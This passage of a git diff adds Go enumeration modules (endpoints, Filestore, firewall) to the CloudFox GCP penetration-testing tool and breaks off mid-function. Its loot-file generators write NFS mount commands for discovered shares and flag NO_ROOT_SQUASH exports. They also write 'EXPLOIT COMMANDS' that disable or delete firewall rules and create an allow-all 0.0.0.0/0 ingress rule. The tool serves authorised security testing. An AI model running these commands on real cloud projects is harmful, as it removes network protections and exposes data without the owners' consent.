*EndpointsModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID := range m.ProjectEndpoints { + tableFiles := m.buildTablesForProject(projectID) + lootFiles := m.generateLootFiles(projectID) + + outputData.ProjectLevelData[projectID] = EndpointsOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), "endpoints") + } +} + +func (m *EndpointsModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allEndpoints := m.getAllEndpoints() + + var tables []internal.TableFile + + if len(allEndpoints) > 0 { + tables = append(tables, internal.TableFile{ + Name: "endpoints", + Header: m.getHeader(), + Body: m.endpointsToTableBody(allEndpoints), + }) + } + + // Generate loot files from all endpoints combined + var lootFiles []internal.LootFile + if len(allEndpoints) > 0 { + // Separate external and internal endpoints + var externalEndpoints, internalEndpoints []Endpoint + for _, ep := range allEndpoints { + if ep.IsExternal { + externalEndpoints = append(externalEndpoints, ep) + } else { + internalEndpoints = append(internalEndpoints, ep) + } + } + + if len(externalEndpoints) > 0 { + lootFiles = append(lootFiles, internal.LootFile{ + Name: "endpoints-external-commands", + Contents: m.generateGroupedCommands(externalEndpoints, true), + }) + } + if len(internalEndpoints) > 0 { + lootFiles = append(lootFiles, internal.LootFile{ + Name: "endpoints-internal-commands", + Contents: m.generateGroupedCommands(internalEndpoints, false), + }) + } + } + + output := EndpointsOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), "endpoints") + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/filestore.go b/gcp/commands/filestore.go new file mode 100644 index 00000000..374e67de --- /dev/null +++ b/gcp/commands/filestore.go @@ -0,0 +1,400 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + filestoreservice "github.com/BishopFox/cloudfox/gcp/services/filestoreService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPFilestoreCommand = &cobra.Command{ + Use: globals.GCP_FILESTORE_MODULE_NAME, + Aliases: []string{"nfs", "files"}, + Short: "Enumerate Filestore NFS instances", + Long: `Enumerate Filestore instances and their file shares.`, + Run: runGCPFilestoreCommand, +} + +type FilestoreModule struct { + gcpinternal.BaseGCPModule + ProjectInstances map[string][]filestoreservice.FilestoreInstanceInfo // projectID -> instances + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex +} + +type FilestoreOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o FilestoreOutput) TableFiles() []internal.TableFile { return o.Table } +func (o FilestoreOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPFilestoreCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_FILESTORE_MODULE_NAME) + if err != nil { + return + } + + module := &FilestoreModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectInstances: make(map[string][]filestoreservice.FilestoreInstanceInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *FilestoreModule) getAllInstances() []filestoreservice.FilestoreInstanceInfo { + var all []filestoreservice.FilestoreInstanceInfo + for _, instances := range m.ProjectInstances { + all = append(all, instances...) + } + return all +} + +func (m *FilestoreModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_FILESTORE_MODULE_NAME, m.processProject) + + allInstances := m.getAllInstances() + if len(allInstances) == 0 { + logger.InfoM("No Filestore instances found", globals.GCP_FILESTORE_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d Filestore instance(s)", len(allInstances)), globals.GCP_FILESTORE_MODULE_NAME) + m.writeOutput(ctx, logger) +} + +func (m *FilestoreModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + m.mu.Lock() + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["filestore-commands"] = &internal.LootFile{ + Name: "filestore-commands", + Contents: "# Filestore Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + m.mu.Unlock() + + svc := filestoreservice.New() + instances, err := svc.ListInstances(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_FILESTORE_MODULE_NAME, + fmt.Sprintf("Could not enumerate Filestore instances in project %s", projectID)) + return + } + + m.mu.Lock() + m.ProjectInstances[projectID] = instances + for _, instance := range instances { + m.addToLoot(projectID, instance) + } + m.mu.Unlock() +} + +func (m *FilestoreModule) addToLoot(projectID string, instance filestoreservice.FilestoreInstanceInfo) { + lootFile := m.LootMap[projectID]["filestore-commands"] + if lootFile == nil { + return + } + // Determine protocol display name + protocol := instance.Protocol + if protocol == "" { + protocol = "NFS_V3" // Default + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# Instance: %s\n"+ + "# =============================================================================\n"+ + "# Location: %s\n"+ + "# Project: %s\n"+ + "# Protocol: %s\n"+ + "# Tier: %s\n"+ + "# Network: %s\n"+ + "# IP(s): %s\n\n", + instance.Name, + instance.Location, + instance.ProjectID, + protocol, + instance.Tier, + instance.Network, + strings.Join(instance.IPAddresses, ", "), + ) + + // gcloud describe command + lootFile.Contents += fmt.Sprintf( + "# Describe instance:\n"+ + "gcloud filestore instances describe %s --location=%s --project=%s\n\n", + instance.Name, instance.Location, instance.ProjectID, + ) + + // Mount commands for each share + if len(instance.Shares) > 0 && len(instance.IPAddresses) > 0 { + for _, share := range instance.Shares { + lootFile.Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# Share: %s (%d GB)\n"+ + "# -----------------------------------------------------------------------------\n", + share.Name, share.CapacityGB, + ) + + // Show NFS export options if present + if len(share.NfsExportOptions) > 0 { + lootFile.Contents += "# NFS Export Options:\n" + for _, opt := range share.NfsExportOptions { + ipRanges := strings.Join(opt.IPRanges, ", ") + if ipRanges == "" { + ipRanges = "all" + } + lootFile.Contents += fmt.Sprintf( + "# IP Ranges: %s\n"+ + "# Access: %s\n"+ + "# Squash: %s\n", + ipRanges, + opt.AccessMode, + opt.SquashMode, + ) + if opt.SquashMode == "NO_ROOT_SQUASH" { + lootFile.Contents += "# [!] NO_ROOT_SQUASH - root access preserved!\n" + } + } + lootFile.Contents += "\n" + } + + // Generate mount commands based on protocol + for _, ip := range instance.IPAddresses { + lootFile.Contents += "# Mount commands (run as root):\n" + + switch protocol { + case "NFS_V4_1": + // NFSv4.1 mount command + lootFile.Contents += fmt.Sprintf( + "# NFSv4.1 mount:\n"+ + "sudo mkdir -p /mnt/%s\n"+ + "sudo mount -t nfs -o vers=4.1 %s:/%s /mnt/%s\n"+ + "# With Kerberos (if configured):\n"+ + "# sudo mount -t nfs -o vers=4.1,sec=krb5p %s:/%s /mnt/%s\n\n", + share.Name, + ip, share.Name, share.Name, + ip, share.Name, share.Name, + ) + default: // NFS_V3 or empty + // NFSv3 mount command + lootFile.Contents += fmt.Sprintf( + "# NFSv3 mount:\n"+ + "sudo mkdir -p /mnt/%s\n"+ + "sudo mount -t nfs -o vers=3 %s:/%s /mnt/%s\n\n", + share.Name, + ip, share.Name, share.Name, + ) + } + + // List contents after mounting + lootFile.Contents += fmt.Sprintf( + "# After mounting, list contents:\n"+ + "ls -la /mnt/%s\n"+ + "# Check disk usage:\n"+ + "df -h /mnt/%s\n\n", + share.Name, share.Name, + ) + + // Unmount command + lootFile.Contents += fmt.Sprintf( + "# Unmount when done:\n"+ + "sudo umount /mnt/%s\n\n", + share.Name, + ) + } + } + } +} + +func (m *FilestoreModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *FilestoreModule) getHeader() []string { + return []string{ + "Project Name", + "Project ID", + "Name", + "Location", + "Tier", + "Protocol", + "Network", + "IP", + "Shares", + "Access", + "Security", + "State", + } +} + +func (m *FilestoreModule) instancesToTableBody(instances []filestoreservice.FilestoreInstanceInfo) [][]string { + var body [][]string + for _, instance := range instances { + var shareNames []string + var accessModes []string + hasNoRootSquash := false + + for _, share := range instance.Shares { + shareNames = append(shareNames, fmt.Sprintf("%s (%dGB)", share.Name, share.CapacityGB)) + for _, opt := range share.NfsExportOptions { + if opt.AccessMode != "" { + accessModes = append(accessModes, opt.AccessMode) + } + if opt.SquashMode == "NO_ROOT_SQUASH" { + hasNoRootSquash = true + } + } + } + + ip := strings.Join(instance.IPAddresses, ", ") + if ip == "" { + ip = "-" + } + + shares := strings.Join(shareNames, ", ") + if shares == "" { + shares = "-" + } + + network := instance.Network + if network == "" { + network = "-" + } + + protocol := instance.Protocol + if protocol == "" { + protocol = "NFS_V3" + } + + // Deduplicate and format access modes + access := "-" + if len(accessModes) > 0 { + uniqueAccess := make(map[string]bool) + for _, a := range accessModes { + uniqueAccess[a] = true + } + var accessList []string + for a := range uniqueAccess { + accessList = append(accessList, a) + } + access = strings.Join(accessList, ", ") + } + + // Security findings + security := "OK" + if hasNoRootSquash { + security = "NO_ROOT_SQUASH" + } + + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.Location, + instance.Tier, + protocol, + network, + ip, + shares, + access, + security, + instance.State, + }) + } + return body +} + +func (m *FilestoreModule) buildTablesForProject(projectID string) []internal.TableFile { + var tableFiles []internal.TableFile + + if instances, ok := m.ProjectInstances[projectID]; ok && len(instances) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: "filestore", + Header: m.getHeader(), + Body: m.instancesToTableBody(instances), + }) + } + + return tableFiles +} + +func (m *FilestoreModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID := range m.ProjectInstances { + tableFiles := m.buildTablesForProject(projectID) + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = FilestoreOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_FILESTORE_MODULE_NAME) + } +} + +func (m *FilestoreModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allInstances := m.getAllInstances() + + var tables []internal.TableFile + + if len(allInstances) > 0 { + tables = append(tables, internal.TableFile{ + Name: "filestore", + Header: m.getHeader(), + Body: m.instancesToTableBody(allInstances), + }) + } + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := FilestoreOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) +} diff --git a/gcp/commands/firewall.go b/gcp/commands/firewall.go new file mode 100644 index 00000000..10c541f4 --- /dev/null +++ b/gcp/commands/firewall.go @@ -0,0 +1,666 @@ +package commands + +import ( + "github.com/BishopFox/cloudfox/gcp/shared" + "context" + "fmt" + "strings" + "sync" + + diagramservice "github.com/BishopFox/cloudfox/gcp/services/diagramService" + NetworkService "github.com/BishopFox/cloudfox/gcp/services/networkService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPFirewallCommand = &cobra.Command{ + Use: globals.GCP_FIREWALL_MODULE_NAME, + Aliases: []string{"fw", "firewall-rules", "network-security"}, + Short: "Enumerate VPC networks and firewall rules with security analysis", + Long: `Enumerate VPC networks, subnets, and firewall rules across projects with security analysis. + +Features: +- Lists all VPC networks and their peering relationships +- Shows all subnets with CIDR ranges and configurations +- Enumerates firewall rules with security risk analysis +- Identifies overly permissive rules (0.0.0.0/0 ingress) +- Detects exposed sensitive ports (SSH, RDP, databases) +- Generates gcloud commands for remediation + +Security Columns: +- Risk: HIGH, MEDIUM, LOW based on exposure analysis +- Direction: INGRESS or EGRESS +- Source: Source IP ranges (0.0.0.0/0 = internet) +- Ports: Allowed ports and protocols +- Issues: Detected security misconfigurations + +Attack Surface: +- 0.0.0.0/0 ingress allows internet access to resources +- All ports allowed means no port restrictions +- No target tags means rule applies to ALL instances +- VPC peering may expose internal resources`, + Run: runGCPFirewallCommand, +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type FirewallModule struct { + gcpinternal.BaseGCPModule + + // Per-project data for hierarchical output + ProjectNetworks map[string][]NetworkService.VPCInfo + ProjectSubnets map[string][]NetworkService.SubnetInfo + ProjectFirewallRules map[string][]NetworkService.FirewallRuleInfo + LootMap map[string]map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type FirewallOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o FirewallOutput) TableFiles() []internal.TableFile { return o.Table } +func (o FirewallOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPFirewallCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_FIREWALL_MODULE_NAME) + if err != nil { + return + } + + module := &FirewallModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectNetworks: make(map[string][]NetworkService.VPCInfo), + ProjectSubnets: make(map[string][]NetworkService.SubnetInfo), + ProjectFirewallRules: make(map[string][]NetworkService.FirewallRuleInfo), + LootMap: make(map[string]map[string]*internal.LootFile), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *FirewallModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_FIREWALL_MODULE_NAME, m.processProject) + + // Get all data for stats + allNetworks := m.getAllNetworks() + allSubnets := m.getAllSubnets() + allRules := m.getAllFirewallRules() + + if len(allRules) == 0 && len(allNetworks) == 0 { + logger.InfoM("No networks or firewall rules found", globals.GCP_FIREWALL_MODULE_NAME) + return + } + + // Count public ingress rules and peerings + publicIngressCount := 0 + for _, rule := range allRules { + if rule.IsPublicIngress { + publicIngressCount++ + } + } + + peeringCount := 0 + for _, network := range allNetworks { + peeringCount += len(network.Peerings) + } + + msg := fmt.Sprintf("Found %d network(s), %d subnet(s), %d firewall rule(s)", + len(allNetworks), len(allSubnets), len(allRules)) + if publicIngressCount > 0 { + msg += fmt.Sprintf(" [%d public ingress]", publicIngressCount) + } + if peeringCount > 0 { + msg += fmt.Sprintf(" [%d peerings]", peeringCount) + } + logger.SuccessM(msg, globals.GCP_FIREWALL_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// getAllNetworks returns all networks from all projects +func (m *FirewallModule) getAllNetworks() []NetworkService.VPCInfo { + var all []NetworkService.VPCInfo + for _, networks := range m.ProjectNetworks { + all = append(all, networks...) + } + return all +} + +// getAllSubnets returns all subnets from all projects +func (m *FirewallModule) getAllSubnets() []NetworkService.SubnetInfo { + var all []NetworkService.SubnetInfo + for _, subnets := range m.ProjectSubnets { + all = append(all, subnets...) + } + return all +} + +// getAllFirewallRules returns all firewall rules from all projects +func (m *FirewallModule) getAllFirewallRules() []NetworkService.FirewallRuleInfo { + var all []NetworkService.FirewallRuleInfo + for _, rules := range m.ProjectFirewallRules { + all = append(all, rules...) + } + return all +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *FirewallModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating networks and firewall in project: %s", projectID), globals.GCP_FIREWALL_MODULE_NAME) + } + + ns := NetworkService.New() + + // Initialize loot for this project + m.mu.Lock() + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["firewall-commands"] = &internal.LootFile{ + Name: "firewall-commands", + Contents: "# Firewall Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + } + m.mu.Unlock() + + var networks []NetworkService.VPCInfo + var subnets []NetworkService.SubnetInfo + var rules []NetworkService.FirewallRuleInfo + + // Get networks + var err error + networks, err = ns.Networks(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_FIREWALL_MODULE_NAME, + fmt.Sprintf("Could not enumerate networks in project %s", projectID)) + } + + // Get subnets + subnets, err = ns.Subnets(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_FIREWALL_MODULE_NAME, + fmt.Sprintf("Could not enumerate subnets in project %s", projectID)) + } + + // Get firewall rules + rules, err = ns.FirewallRulesEnhanced(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_FIREWALL_MODULE_NAME, + fmt.Sprintf("Could not enumerate firewall rules in project %s", projectID)) + } + + // Thread-safe store per-project + m.mu.Lock() + m.ProjectNetworks[projectID] = networks + m.ProjectSubnets[projectID] = subnets + m.ProjectFirewallRules[projectID] = rules + + for _, network := range networks { + m.addNetworkToLoot(projectID, network) + } + for _, rule := range rules { + m.addFirewallRuleToLoot(projectID, rule) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d network(s), %d subnet(s), %d rule(s) in project %s", + len(networks), len(subnets), len(rules), projectID), globals.GCP_FIREWALL_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *FirewallModule) addNetworkToLoot(projectID string, network NetworkService.VPCInfo) { + lootFile := m.LootMap[projectID]["firewall-commands"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( + "# =============================================================================\n"+ + "# NETWORK: %s\n"+ + "# =============================================================================\n"+ + "# Project: %s\n\n"+ + "gcloud compute networks describe %s --project=%s\n"+ + "gcloud compute networks subnets list --network=%s --project=%s\n"+ + "gcloud compute firewall-rules list --filter=\"network:%s\" --project=%s\n\n", + network.Name, + network.ProjectID, + network.Name, network.ProjectID, + network.Name, network.ProjectID, + network.Name, network.ProjectID, + ) +} + +func (m *FirewallModule) addFirewallRuleToLoot(projectID string, rule NetworkService.FirewallRuleInfo) { + lootFile := m.LootMap[projectID]["firewall-commands"] + if lootFile == nil { + return + } + + lootFile.Contents += fmt.Sprintf( + "# -----------------------------------------------------------------------------\n"+ + "# RULE: %s\n"+ + "# -----------------------------------------------------------------------------\n"+ + "# Network: %s\n"+ + "# Project: %s\n"+ + "# Direction: %s\n"+ + "# Priority: %d\n"+ + "# Disabled: %v\n", + rule.Name, rule.Network, rule.ProjectID, + rule.Direction, rule.Priority, rule.Disabled, + ) + + lootFile.Contents += fmt.Sprintf( + "\n# === ENUMERATION COMMANDS ===\n\n"+ + "# Describe rule:\n"+ + "gcloud compute firewall-rules describe %s --project=%s\n\n"+ + "# List all rules for this network:\n"+ + "gcloud compute firewall-rules list --filter=\"network:%s\" --project=%s --sort-by=priority\n\n", + rule.Name, rule.ProjectID, + rule.Network, rule.ProjectID, + ) + + // Exploit commands + lootFile.Contents += fmt.Sprintf( + "# === EXPLOIT COMMANDS ===\n\n"+ + "# Disable this firewall rule:\n"+ + "gcloud compute firewall-rules update %s --disabled --project=%s\n\n"+ + "# Create a permissive rule to allow all inbound traffic:\n"+ + "gcloud compute firewall-rules create cloudfox-allow-all --network=%s --allow=tcp,udp,icmp --source-ranges=0.0.0.0/0 --priority=1 --project=%s\n\n"+ + "# Create rule to allow SSH from your IP:\n"+ + "gcloud compute firewall-rules create cloudfox-ssh --network=%s --allow=tcp:22 --source-ranges=YOUR_IP/32 --priority=100 --project=%s\n\n"+ + "# Delete this firewall rule:\n"+ + "gcloud compute firewall-rules delete %s --project=%s\n\n", + rule.Name, rule.ProjectID, + rule.Network, rule.ProjectID, + rule.Network, rule.ProjectID, + rule.Name, rule.ProjectID, + ) +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *FirewallModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Generate ASCII diagram and add to loot + diagram := m.generateFirewallDiagram() + if diagram != "" { + // Add diagram to the first project's loot (or create a combined one) + for projectID := range m.LootMap { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + m.LootMap[projectID]["firewall-diagram"] = &internal.LootFile{ + Name: "firewall-diagram", + Contents: diagram, + } + break // Only add once for flat output + } + + // For hierarchical output, add to all projects + if m.Hierarchy != nil && !m.FlatOutput { + for projectID := range m.LootMap { + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + } + m.LootMap[projectID]["firewall-diagram"] = &internal.LootFile{ + Name: "firewall-diagram", + Contents: diagram, + } + } + } + } + + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// Table headers +func (m *FirewallModule) getRulesHeader() []string { + return []string{ + "Project", "Rule Name", "Network", "Direction", + "Priority", "Source Ranges", "Allowed", "Targets", "Disabled", "Logging", + } +} + +func (m *FirewallModule) getNetworksHeader() []string { + return []string{ + "Project", "Network Name", "Routing Mode", + "Subnets", "Peerings", "Auto Subnets", + } +} + +func (m *FirewallModule) getSubnetsHeader() []string { + return []string{ + "Project", "Network", "Subnet Name", + "Region", "CIDR Range", "Private Google Access", + } +} + +// rulesToTableBody converts rules to table body rows +func (m *FirewallModule) rulesToTableBody(rules []NetworkService.FirewallRuleInfo) [][]string { + var body [][]string + for _, rule := range rules { + sources := strings.Join(rule.SourceRanges, ", ") + if sources == "" { + sources = "-" + } + + allowed := formatProtocols(rule.AllowedProtocols) + if allowed == "" { + allowed = "-" + } + + targets := "-" + if len(rule.TargetTags) > 0 { + targets = strings.Join(rule.TargetTags, ", ") + } else if len(rule.TargetSAs) > 0 { + targets = strings.Join(rule.TargetSAs, ", ") + } else { + targets = "ALL" + } + + body = append(body, []string{ + m.GetProjectName(rule.ProjectID), + rule.Name, + rule.Network, + rule.Direction, + fmt.Sprintf("%d", rule.Priority), + sources, + allowed, + targets, + shared.BoolToYesNo(rule.Disabled), + shared.BoolToYesNo(rule.LoggingEnabled), + }) + } + return body +} + +// networksToTableBody converts networks to table body rows +func (m *FirewallModule) networksToTableBody(networks []NetworkService.VPCInfo) [][]string { + var body [][]string + for _, network := range networks { + subnetCount := len(network.Subnetworks) + + peerings := "-" + if len(network.Peerings) > 0 { + var peerNames []string + for _, p := range network.Peerings { + peerNames = append(peerNames, p.Name) + } + peerings = strings.Join(peerNames, ", ") + } + + body = append(body, []string{ + m.GetProjectName(network.ProjectID), + network.Name, + network.RoutingMode, + fmt.Sprintf("%d", subnetCount), + peerings, + shared.BoolToYesNo(network.AutoCreateSubnetworks), + }) + } + return body +} + +// subnetsToTableBody converts subnets to table body rows +func (m *FirewallModule) subnetsToTableBody(subnets []NetworkService.SubnetInfo) [][]string { + var body [][]string + for _, subnet := range subnets { + body = append(body, []string{ + m.GetProjectName(subnet.ProjectID), + subnet.Network, + subnet.Name, + subnet.Region, + subnet.IPCidrRange, + shared.BoolToYesNo(subnet.PrivateIPGoogleAccess), + }) + } + return body +} + +// buildTablesForProject builds all tables for given project data +func (m *FirewallModule) buildTablesForProject(networks []NetworkService.VPCInfo, subnets []NetworkService.SubnetInfo, rules []NetworkService.FirewallRuleInfo) []internal.TableFile { + var tableFiles []internal.TableFile + + rulesBody := m.rulesToTableBody(rules) + if len(rulesBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_FIREWALL_MODULE_NAME + "-rules", + Header: m.getRulesHeader(), + Body: rulesBody, + }) + } + + networksBody := m.networksToTableBody(networks) + if len(networksBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_FIREWALL_MODULE_NAME + "-networks", + Header: m.getNetworksHeader(), + Body: networksBody, + }) + } + + subnetsBody := m.subnetsToTableBody(subnets) + if len(subnetsBody) > 0 { + tableFiles = append(tableFiles, internal.TableFile{ + Name: globals.GCP_FIREWALL_MODULE_NAME + "-subnets", + Header: m.getSubnetsHeader(), + Body: subnetsBody, + }) + } + + return tableFiles +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *FirewallModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Collect all projects with data + projectsWithData := make(map[string]bool) + for projectID := range m.ProjectNetworks { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectSubnets { + projectsWithData[projectID] = true + } + for projectID := range m.ProjectFirewallRules { + projectsWithData[projectID] = true + } + + for projectID := range projectsWithData { + networks := m.ProjectNetworks[projectID] + subnets := m.ProjectSubnets[projectID] + rules := m.ProjectFirewallRules[projectID] + + tableFiles := m.buildTablesForProject(networks, subnets, rules) + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = FirewallOutput{Table: tableFiles, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_FIREWALL_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *FirewallModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allNetworks := m.getAllNetworks() + allSubnets := m.getAllSubnets() + allRules := m.getAllFirewallRules() + + tableFiles := m.buildTablesForProject(allNetworks, allSubnets, allRules) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + output := FirewallOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_FIREWALL_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// ------------------------------ +// Diagram Generation +// ------------------------------ + +// generateFirewallDiagram creates an ASCII visualization of firewall rules +func (m *FirewallModule) generateFirewallDiagram() string { + allRules := m.getAllFirewallRules() + if len(allRules) == 0 { + return "" + } + + // Group rules by network + rulesByNetwork := make(map[string][]NetworkService.FirewallRuleInfo) + for _, rule := range allRules { + key := rule.ProjectID + "/" + rule.Network + rulesByNetwork[key] = append(rulesByNetwork[key], rule) + } + + var sb strings.Builder + width := 90 + + // Header + sb.WriteString(diagramservice.DrawBox("GCP FIREWALL RULES DIAGRAM - Generated by CloudFox", width)) + sb.WriteString("\n") + + // Draw diagram for each network + for key, rules := range rulesByNetwork { + parts := strings.SplitN(key, "/", 2) + projectID := "" + networkName := key + if len(parts) == 2 { + projectID = parts[0] + networkName = parts[1] + } + + // Convert to diagram service types + diagramRules := make([]diagramservice.FirewallRuleInfo, 0, len(rules)) + for _, r := range rules { + allowedPorts := formatProtocols(r.AllowedProtocols) + if allowedPorts == "" { + allowedPorts = "*" + } + + targets := "ALL" + if 